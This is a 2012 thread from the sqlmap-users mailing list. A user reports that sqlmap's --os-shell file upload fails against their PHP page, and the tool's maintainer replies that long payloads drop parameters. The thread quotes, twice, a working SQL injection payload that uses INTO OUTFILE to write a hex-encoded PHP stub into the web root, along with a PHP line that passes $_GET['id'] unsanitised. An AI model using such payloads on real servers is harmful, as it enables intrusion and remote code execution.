sqlmap-users

[sqlmap-users] the default --os-shell payload could not upload

[li <li...@gm...>]

Hello there,


i just get a problem when i use the --os-shell command.english is not my mother languag.But i will try my best to explain the situation.

when i use the default --os-shell payload ,it does not work.the server respose is

HTTP/1.1 200 OK

Date: Mon, 17 Dec 2012 11:42:34 GMT

Server: Apache/2.2.16 (Debian)

X-Powered-By: PHP/5.3.3-7+squeeze14

Vary: Accept-Encoding

Content-Length: 1858

Content-Type: text/html

and a error message in the page :

Notice: Undefined index: id in /var/www/cat.php on line 6

the 6th line in my cat.php is :

<?php

require "header.php";

$pics = Picture:all ($_GET["id"]); ------the sixth line.

but if i shorten the payload .just like


1%20LIMIT%201%20INTO%20OUTFILE%20'/var/www/tmpuyvgq.php'%20LINES%20TERMINATED%20BY%200x3c3f7068700a696620286973737d3f3e0a%20--

this payload would work.the file is written .and the server response :

Mon, 17 Dec 2012 12:02:17 GMT

Server: Apache/2.2.16 (Debian)

X-Powered-By: PHP/5.3.3-7+squeeze14

Vary: Accept-Encoding

Content-Length: 1211

Content-Type: text/html

also with an error message:

Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean 
given in /var/www/classes/picture.php on line 22


i thougth maybe the length of the url is too long .maybe there is some 
error in my php conf.but i thought the default should works on all kinds 
of situation.i could not figure out the problem.

thanks everyone.

by the way. i could not receive the mailing list content.i dont know if 
you can receive this email.

Re: [sqlmap-users] the default --os-shell payload could not upload

[Miroslav S. <mir...@gm...>]

Undefined index while used for sure is a sign of dropped parameters almost
always in cases of long payloads

Kind regards,
Miroslav Stampar
On Dec 17, 2012 1:21 PM, "li" <li...@gm...> wrote:

>  Hello there,
>
>
> i just get a problem when i use the --os-shell command.english is not my mother languag.But i will try my best to explain the situation.
>
> when i use the default --os-shell payload ,it does not work.the server respose is
>
> HTTP/1.1 200 OK
>
> Date: Mon, 17 Dec 2012 11:42:34 GMT
>
> Server: Apache/2.2.16 (Debian)
>
> X-Powered-By: PHP/5.3.3-7+squeeze14
>
> Vary: Accept-Encoding
>
> Content-Length: 1858
>
> Content-Type: text/html
>
> and a error message in the page :
>
> Notice: Undefined index: id in /var/www/cat.php on line 6
>
> the 6th line in my cat.php is :
>
>   <？php
>
> require “header.php”;
>
> $pics = Picture:all ($_GET[“id”]); ------the sixth line.
>
> but if i shorten the payload .just like
>
>
>
> 1%20LIMIT%201%20INTO%20OUTFILE%20'/var/www/tmpuyvgq.php'%20LINES%20TERMINATED%20BY%200x3c3f7068700a696620286973737d3f3e0a%20--
>
> this payload would work.the file is written .and the server response :
>
>  Mon, 17 Dec 2012 12:02:17 GMT
>
> Server: Apache/2.2.16 (Debian)
>
> X-Powered-By: PHP/5.3.3-7+squeeze14
>
> Vary: Accept-Encoding
>
> Content-Length: 1211
>
> Content-Type: text/html
>
> also with an error message:
>
> Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean
> given in /var/www/classes/picture.php on line 22
>
>  i thougth maybe the length of the url is too long .maybe there is some
> error in my php conf.but i thought the default should works on all kinds of
> situation.i could not figure out the problem.
>
> thanks everyone.
>
> by the way. i could not receive the mailing list content.i dont know if
> you can receive this email.
>
>
>
> ------------------------------------------------------------------------------
> LogMeIn Rescue: Anywhere, Anytime Remote support for IT. Free Trial
> Remotely access PCs and mobile devices and provide instant support
> Improve your efficiency, and focus on delivering more value-add services
> Discover what IT Professionals Know. Rescue delivers
> http://p.sf.net/sfu/logmein_12329d2d
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>